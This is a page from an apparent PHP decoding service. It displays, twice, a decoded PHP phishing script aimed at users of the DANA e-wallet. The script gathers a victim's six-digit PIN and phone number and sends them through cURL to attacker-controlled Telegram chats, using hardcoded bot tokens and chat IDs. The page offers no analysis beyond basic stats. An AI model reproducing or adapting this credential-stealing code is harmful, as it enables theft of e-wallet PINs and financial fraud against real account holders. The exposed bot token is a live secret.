Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php include "../../telegram.php"; session_start(); $nohp = $_SESSION['nohp']; $pin1 ..
Decoded Output download
<?php
include "../../telegram.php";
session_start();
$nohp = $_SESSION['nohp'];
$pin1 = $_POST['pin1'];
$pin2 = $_POST['pin2'];
$pin3 = $_POST['pin3'];
$pin4 = $_POST['pin4'];
$pin5 = $_POST['pin5'];
$pin6 = $_POST['pin6'];
$pin = $pin1.$pin2.$pin3.$pin4.$pin5.$pin6;
$_SESSION['pin'] = $pin;
$message = "
( DANA | PIN | ".$nohp." )
- No HP : ".$nohp."
- PIN : ".$pin."
";
// Variabel untuk obrolan dan bot kedua
$id_telegram2 = "6361731276";
$id_botTele2 = "6133204615:AAGU2SUYPWVAxP3_mRJfndaM1WIX4fJcDXM";
function sendMessage($id_telegram, $message, $id_botTele) {
$url = "https://api.telegram.org/bot" . $id_botTele . "/sendMessage?parse_mode=HTML&chat_id=" . $id_telegram;
$url = $url . "&text=" . urlencode($message);
$ch = curl_init();
$optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true);
curl_setopt_array($ch, $optArray);
$result = curl_exec($ch);
curl_close($ch);
}
sendMessage($id_telegram, $message, $id_botTele);
sendMessage($id_telegram2, $message, $id_botTele2);
?>
Did this file decode correctly?
Original Code
<?php
include "../../telegram.php";
session_start();
$nohp = $_SESSION['nohp'];
$pin1 = $_POST['pin1'];
$pin2 = $_POST['pin2'];
$pin3 = $_POST['pin3'];
$pin4 = $_POST['pin4'];
$pin5 = $_POST['pin5'];
$pin6 = $_POST['pin6'];
$pin = $pin1.$pin2.$pin3.$pin4.$pin5.$pin6;
$_SESSION['pin'] = $pin;
$message = "
( DANA | PIN | ".$nohp." )
- No HP : ".$nohp."
- PIN : ".$pin."
";
// Variabel untuk obrolan dan bot kedua
$id_telegram2 = "6361731276";
$id_botTele2 = "6133204615:AAGU2SUYPWVAxP3_mRJfndaM1WIX4fJcDXM";
function sendMessage($id_telegram, $message, $id_botTele) {
$url = "https://api.telegram.org/bot" . $id_botTele . "/sendMessage?parse_mode=HTML&chat_id=" . $id_telegram;
$url = $url . "&text=" . urlencode($message);
$ch = curl_init();
$optArray = array(CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true);
curl_setopt_array($ch, $optArray);
$result = curl_exec($ch);
curl_close($ch);
}
sendMessage($id_telegram, $message, $id_botTele);
sendMessage($id_telegram2, $message, $id_botTele2);
?>
Function Calls
None |
Stats
MD5 | 4367150269de5e0f9118f95da9d04567 |
Eval Count | 0 |
Decode Time | 50 ms |